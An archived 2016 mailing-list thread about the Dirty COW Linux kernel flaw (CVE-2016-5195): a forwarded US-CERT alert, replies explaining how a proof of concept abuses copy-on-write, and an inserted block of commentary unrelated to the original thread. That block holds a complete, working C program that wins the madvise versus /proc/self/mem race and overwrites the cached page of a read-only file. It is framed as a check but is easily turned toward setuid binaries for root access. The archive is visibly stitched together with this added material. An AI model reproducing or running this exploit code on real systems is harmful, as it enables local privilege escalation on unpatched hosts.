Fwd: Linux Kernel Vulnerability

Jason Wright jason at thought.net
Sat Oct 22 20:09:23 CDT 2016


The particular POC we examined required the ability to read a setuid binary
(normally 4755 permissions, so allowed), write to the disk (/tmp would do),
and the ability to execute non-privileged system calls (madvise, open,
mmap, etc.).

The POC wrote arbitrary code to a file system cache page (normally mapped
R/O, copy on write, into a process). Instead of being COW, due to a race
condition, the cache page itself was overwritten. Now when the polluted
cache page belonging to the setuid binary is run, it runs the attacker-provided
code... with the elevated privileges.

There are probably other ways to take advantage of the vulnerability, so
don't assume that restricting any or all of the above constitutes a defense.
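The race described in the message above, turned into a self-contained check. This is an added example, not code from the thread or from the PoC the message examined: it creates a scratch file, maps it read-only with MAP_PRIVATE, then runs one thread calling madvise(MADV_DONTNEED) on the mapping against a second thread writing to the same address through /proc/self/mem, and finally reads the file back. On a vulnerable kernel the forced write lands on the shared page-cache page instead of a private copy, so the read-back shows the payload; on a patched kernel it shows the original bytes. The file path, the iteration bound and the two strings are assumptions for the example, and it targets a file it owns rather than a setuid binary, so it exercises the primitive without escalating anything.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* Bounded so the check always terminates (assumed value, not from the thread);
 * the race is probabilistic, so raise it for a longer attempt. */
#define ITERATIONS 200000

static const char ORIGINAL[] = "original-content-on-disk\n"; /* constructed */
static const char PAYLOAD[]  = "ATTACKER-WRITTEN";            /* constructed */

struct race_ctx {
    void  *map;        /* MAP_PRIVATE, PROT_READ mapping of the scratch file */
    size_t len;        /* bytes mapped */
    int    procmem_ok; /* set once /proc/self/mem was opened for writing */
};

/* Thread A: keep discarding the private page so every write below must fault
 * the page in again from the page cache. That re-fault is the window in which
 * a vulnerable kernel hands out the shared cache page instead of a COW copy. */
static void *madvise_thread(void *arg)
{
    struct race_ctx *ctx = arg;
    for (int i = 0; i < ITERATIONS; i++)
        madvise(ctx->map, ctx->len, MADV_DONTNEED);
    return NULL;
}

/* Thread B: write into the read-only mapping via /proc/self/mem, which the
 * kernel services as a forced write (it has to COW a read-only mapping);
 * that forced-write path is what CVE-2016-5195 mishandled. */
static void *procmem_thread(void *arg)
{
    struct race_ctx *ctx = arg;
    int fd = open("/proc/self/mem", O_RDWR);
    if (fd < 0)
        return NULL;
    ctx->procmem_ok = 1;
    off_t where = (off_t)(uintptr_t)ctx->map;
    for (int i = 0; i < ITERATIONS; i++)
        pwrite(fd, PAYLOAD, sizeof(PAYLOAD) - 1, where);
    close(fd);
    return NULL;
}

/* 1 = file contents changed (kernel vulnerable), 0 = writes were correctly
 * copied-on-write, -1 = the check could not be set up. */
int dirtycow_check(const char *path)
{
    int result = -1;
    size_t len = sizeof(ORIGINAL) - 1;
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0)
        return -1;
    ssize_t w = write(fd, ORIGINAL, len);
    close(fd);
    chmod(path, 0444);                 /* read-only, like a 4755 binary's text */
    if (w != (ssize_t)len || (fd = open(path, O_RDONLY)) < 0) {
        unlink(path);
        return -1;
    }
    void *map = mmap(NULL, len, PROT_READ, MAP_PRIVATE, fd, 0);
    close(fd);
    if (map == MAP_FAILED) {
        unlink(path);
        return -1;
    }
    struct race_ctx ctx = { map, len, 0 };
    pthread_t ta, tb;
    if (pthread_create(&ta, NULL, madvise_thread, &ctx) == 0) {
        if (pthread_create(&tb, NULL, procmem_thread, &ctx) == 0) {
            pthread_join(tb, NULL);
            result = ctx.procmem_ok ? 0 : -1;
        }
        pthread_join(ta, NULL);
    }
    munmap(map, len);
    if (result == 0 && (fd = open(path, O_RDONLY)) >= 0) {
        /* read() is served from the page cache, so a polluted cache page shows
         * up here even though nothing was written back to disk. */
        char buf[sizeof(ORIGINAL)] = { 0 };
        ssize_t n = read(fd, buf, sizeof(buf) - 1);
        close(fd);
        if (n >= (ssize_t)(sizeof(PAYLOAD) - 1) &&
            memcmp(buf, PAYLOAD, sizeof(PAYLOAD) - 1) == 0)
            result = 1;
    }
    unlink(path);
    return result;
}

int main(void)
{
    int r = dirtycow_check("/tmp/dirtycow_check.tmp"); /* assumed scratch path */
    if (r == 1)
        puts("VULNERABLE: page-cache page of a read-only file was overwritten");
    else if (r == 0)
        puts("not triggered: writes were copy-on-write (patched, or not hit in ITERATIONS)");
    else
        puts("check could not run (no /proc/self/mem, /tmp or threads?)");
    return r == 1 ? 2 : (r == 0 ? 0 : 1);
}
```

Build with `gcc -pthread`. A negative result within the iteration bound is not proof of a patched kernel, because the race may simply not have been won; the authoritative check is the vendor's fixed kernel package. Note that nothing in the program needs more than an unprivileged user can do, which is the point of the message above.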

On Oct 21, 2016 4:56 PM, "Alex Fraser" <beatnic at comcast.net> wrote:

> That sounds like a cover story.  Could this exploit be used to gain access
> to Linux servers running Apache?
>
> BTW a DDOS attack made the news at noon on WUSA (old channel 9).  They
> said it was large and affected the East Coast of the United Snakes.
>
>
> RICHARD BARTH wrote on 10/21/2016 5:57 PM:
>
> According to one review I read, it was discovered some years ago and a fix
> prepared.
>
> It was dropped, though, because the fix caused problems with one of the
> IBM machines the software was commonly run on, and the bug wasn't
> considered to be a big one at the time.
>
>
> Dick
>
> On October 21, 2016 at 5:46 PM Jason Wright <jason at thought.net>
> <jason at thought.net> wrote:
>
> A friend and I spent some time looking at a proof-of-concept exploit of
> this vulnerability this afternoon. Nasty... Essentially it provides a pivot
> from unprivileged user to root by allowing the corruption of a cached page
> that is supposed to be read only (copy on write). It's pretty clever and,
> because it doesn't corrupt the file on disk, not easily traceable.
>
> --Jason Wright
>
> On Oct 21, 2016 2:20 PM, "RICHARD BARTH" <w3hwn at comcast.net> wrote:
>
>
> ---------- Original Message ----------
> From: US-CERT <US-CERT at ncas.us-cert.gov>
> To: w3hwn at arrl.net
> Date: October 21, 2016 at 2:20 PM
> Subject: Linux Kernel Vulnerability
>
>
> National Cyber Awareness System:
>
>
> Linux Kernel Vulnerability
> <https://www.us-cert.gov/ncas/current-activity/2016/10/21/Linux-Kernel-Vulnerability>
> 10/21/2016 12:50 PM EDT
>
> Original release date: October 21, 2016
>
> US-CERT is aware of a Linux kernel vulnerability known as Dirty COW
> (CVE-2016-5195). Exploitation of this vulnerability may allow an attacker
> to take control of an affected system.
>
> US-CERT recommends that users and administrators review the Red Hat CVE
> Database <https://access.redhat.com/security/cve/cve-2016-5195>, the Canonical
> Ubuntu CVE Tracker
> <http://people.canonical.com/%7Eubuntu-security/cve/2016/CVE-2016-5195.html>,
> and CERT Vulnerability Note VU#243144
> <https://www.kb.cert.org/vuls/id/243144> for additional details, and
> refer to their Linux or Unix-based OS vendors for appropriate patches.
>
>
> _______________________________________________
> Tacos mailing list
> Tacos at amrad.org
> https://lists.amrad.org/mailman/listinfo/tacos
>
>
>
>
>
> --
>
>     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>        No electrons were harmed in the creation of this message
>          --------------------------------------------------------
>  ~~~******************* Alex Fraser *******************~~~
>          --------------------------------------------------------
> [[[[[[~~^^^#___=>>>```/\/\**O**/\/\```<<<=___#^^^~~]]]]]]
>
>
>
>